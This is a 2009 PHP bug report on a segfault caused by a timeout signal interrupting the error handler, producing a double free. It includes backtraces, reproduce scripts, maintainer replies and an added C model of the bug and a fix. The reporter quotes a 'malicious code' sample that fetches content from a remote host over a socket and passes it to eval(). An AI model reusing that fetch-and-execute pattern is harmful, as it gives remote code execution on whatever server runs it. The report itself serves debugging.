Bug #49484 max_execution_time interrupts the error_handler causing a segfault
Submitted: 2009-09-06 13:21 UTC Modified: 2009-11-20 01:00 UTC
From: witekfl at gazeta dot pl Assigned:
Status: No Feedback Package: Reproducible crash
PHP Version: 5.2.10 OS: Debian Linux
Private report: No CVE-ID: None
 [2009-09-06 13:21 UTC] witekfl at gazeta dot pl
Description:
------------
php-5.2.10 with the fpm patch applied, running as FastCGI with Apache and mod_fcgid.
Here is a fragment of the backtrace:
#0  0x00007f86f9acced5 in raise () from /lib/libc.so.6
#1  0x00007f86f9ace3f3 in abort () from /lib/libc.so.6
#2  0x00007f86f9b093a8 in ?? () from /lib/libc.so.6
#3  0x00007f86f9b0e948 in ?? () from /lib/libc.so.6
#4  0x00007f86f9b10a56 in free () from /lib/libc.so.6
#5  0x00000000006a5509 in php_error_cb (type=1,
    error_filename=0xe37778 "/var/www/virtual/erc.blabla.pl/side_left.php(25) : eval()'d code(1) : eval()'d code",
    error_lineno=9, format=<value optimized out>, args=<value optimized out>)
    at /home/witekfl/PHP/php-5.2.10/main/main.c:831
#6  0x00000000006e5f04 in zend_error (type=1, format=0x9c2418 "Maximum execution time of %d second%s exceeded")
    at /home/witekfl/PHP/php-5.2.10/Zend/zend.c:976
#7  <signal handler called>
#8  0x00007f86f9b15d95 in strdup () from /lib/libc.so.6
#9  0x00000000006a551a in php_error_cb (type=2,
    error_filename=0xe37778 "/var/www/virtual/erc.blabla.pl/side_left.php(25) : eval()'d code(1) : eval()'d code",
    error_lineno=9, format=<value optimized out>, args=<value optimized out>)
    at /home/witekfl/PHP/php-5.2.10/main/main.c:834
#10 0x00000000006e5f04 in zend_error (type=2, format=0x9c4778 "%s%s%s(): supplied argument is not a valid %s resource")
    at /home/witekfl/PHP/php-5.2.10/Zend/zend.c:976
#11 0x00000000006f35ce in zend_fetch_resource (passed_id=<value optimized out>, default_id=<value optimized out>,
    resource_type_name=0x9abbd0 "stream", found_resource_type=0x0, num_resource_types=<value optimized out>)
    at /home/witekfl/PHP/php-5.2.10/Zend/zend_list.c:130


And here is the fragment of main.c:
        /* store the error if it has changed */
        if (display) {
                if (PG(last_error_message)) {
                        free(PG(last_error_message));
                }
                if (PG(last_error_file)) {
                        free(PG(last_error_file));
                }
                PG(last_error_type) = type;
                PG(last_error_message) = strdup(buffer);
                PG(last_error_file) = strdup(error_filename);
                PG(last_error_lineno) = error_lineno;
        }

After the free(), php_error_cb is interrupted by the signal (zend_timeout) and the given fragment is run again with the new error message, but PG(last_error_message) or PG(last_error_file) has already been freed and still holds the old value, so the second free causes the crash.

max_execution_time = 2
allow_url_fopen = Off


Reproduce code:
---------------
<?php
ini_set("max_execution_time", 2);
for (;;) {
  file_get_contents("http://google.com/");
}
/* I'm not sure whether exactly this code crashes, but code with undefined variables and functions that tries to connect to the outside will crash very often. Connections to the outside are rejected by iptables. */


Expected result:
----------------
No segfaults.

Actual result:
--------------
Often segfaults.
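The double free described above, modelled as an added C example (not PHP's code and not the reporter's): a pointer registry stands in for the allocator so the second free() of the same block is counted instead of aborting, and a flag-setting timeout handler is shown beside the re-entering one as the mitigation. Names such as store_vulnerable, store_fixed and tracked_free are the example's own.

```c
/* Added example, not PHP's code: a model of the php_error_cb double free.
 * A pointer registry stands in for the allocator so a second free() of the
 * same block is counted instead of aborting, as glibc does in the backtrace. */
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>

#define MAX_LIVE 8
static char *live[MAX_LIVE];       /* blocks currently allocated */
static int double_free_count;      /* frees of a block not in the registry */
static char *last_error_message;   /* models PG(last_error_message) */
static int timeout_pending;        /* the model's SIGALRM: fires once, mid-store */
static int timeout_deferred;       /* flag set by the async-signal-safe handler */
static char *tracked_strdup(const char *s) {
    char *p = strdup(s);
    for (int i = 0; i < MAX_LIVE; i++) if (!live[i]) { live[i] = p; return p; }
    abort();                       /* registry full: cannot happen in these scenarios */
}
static void tracked_free(char *p) {
    for (int i = 0; i < MAX_LIVE; i++) if (live[i] == p) { live[i] = NULL; free(p); return; }
    double_free_count++;           /* p was already released: the bug */
}
static void reset(void) {
    for (int i = 0; i < MAX_LIVE; i++) if (live[i]) { free(live[i]); live[i] = NULL; }
    double_free_count = timeout_pending = timeout_deferred = 0;
    last_error_message = NULL;
}
/* Vulnerable: the timeout handler re-enters the store routine (as zend_timeout ->
 * zend_error -> php_error_cb does) while the freed pointer is still stored. */
static void store_vulnerable(const char *msg) {
    if (last_error_message) tracked_free(last_error_message);
    if (timeout_pending) { timeout_pending = 0; store_vulnerable("Maximum execution time exceeded"); }
    last_error_message = tracked_strdup(msg);
}
/* Hardened: the handler only sets a flag (no free/strdup in signal context), and
 * the pointer is cleared before free() so no stale value can be observed. */
static void store_fixed(const char *msg) {
    char *old = last_error_message;
    last_error_message = NULL;
    if (old) tracked_free(old);
    if (timeout_pending) { timeout_pending = 0; timeout_deferred = 1; }
    last_error_message = tracked_strdup(msg);
    if (timeout_deferred) { timeout_deferred = 0; store_fixed("Maximum execution time exceeded"); }
}
/* Scenarios: store one error, then a second whose free()/strdup() window is hit
 * by the timeout. Each returns the number of double frees observed. */
int run_vulnerable(void) { reset(); store_vulnerable("first"); timeout_pending = 1; store_vulnerable("second"); return double_free_count; }
int run_fixed(void) { reset(); store_fixed("first"); timeout_pending = 1; store_fixed("second"); return double_free_count; }
const char *last_message(void) { return last_error_message; }
```

In the model the interrupt lands at one fixed point; a real signal can land anywhere, which is why the hardened form keeps free() and strdup() out of the handler entirely rather than relying on pointer clearing alone.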

Patches

max_execution_time-prevent_double_free.patch (last revision 2010-03-13 08:17 UTC by witekfl at gazeta dot pl)


History

 [2009-09-06 13:31 UTC] jani@php.net
Obvious question is: Does it happen without the 3rd party patch?
 [2009-09-06 14:19 UTC] witekfl at gazeta dot pl
I disabled fpm and still the same.
 [2009-09-09 13:13 UTC] witekfl at gazeta dot pl
Here is the malicious code:

<?php
@$s = fsockopen("google.com",80);
stream_set_timeout($s, 3);
fputs($s, "GET / HTTP/1.0\nHost: google.com\n\n");
$o="";
while(!feof($s)) $o.=fgets($s,1000);
$o=substr($o,strpos($o,"\r\n\r\n")+4);
fclose($s);
eval($o);
?>
aa

The setup is the following:
nginx + apache + mod_layout + mod_fcgid + php-cgi as FastCGI
php-cgi has the suid bit set and runs as user www-data.
nginx and apache run as different users from php-cgi.
max_execution_time is 2 seconds.
iptables rejects connections to google.com (to the outside) for php-cgi.
php segfaults very often and Apache returns status 500.
 [2009-09-09 19:54 UTC] jani@php.net
To rule out one possible problem: is ZTS enabled in your build? (check
your phpinfo() output for "Thread Safety", it should be "disabled").
 [2009-09-09 19:59 UTC] witekfl at gazeta dot pl
ThreadSafety disabled.
 [2009-09-11 19:54 UTC] witekfl at gazeta dot pl
php.ini:
display_errors = Off
max_execution_time = 1
disable_functions = sleep

t.php:
<?php
for (;;) {
    sleep(1);
}

cat t.php | php-cgi -c php.ini

Run it a few times.
It segfaults for me.

Try with export MALLOC_CHECK_=2
 [2009-11-12 22:54 UTC] jani@php.net
Please try using this snapshot:

  http://snaps.php.net/php5.2-latest.tar.gz
 
For Windows:

  http://windows.php.net/snapshots/


 [2009-11-20 01:00 UTC] php-bugs at lists dot php dot net
No feedback was provided for this bug for over a week, so it is
being suspended automatically. If you are able to provide the
information that was originally requested, please do so and change
the status of the bug back to "Open".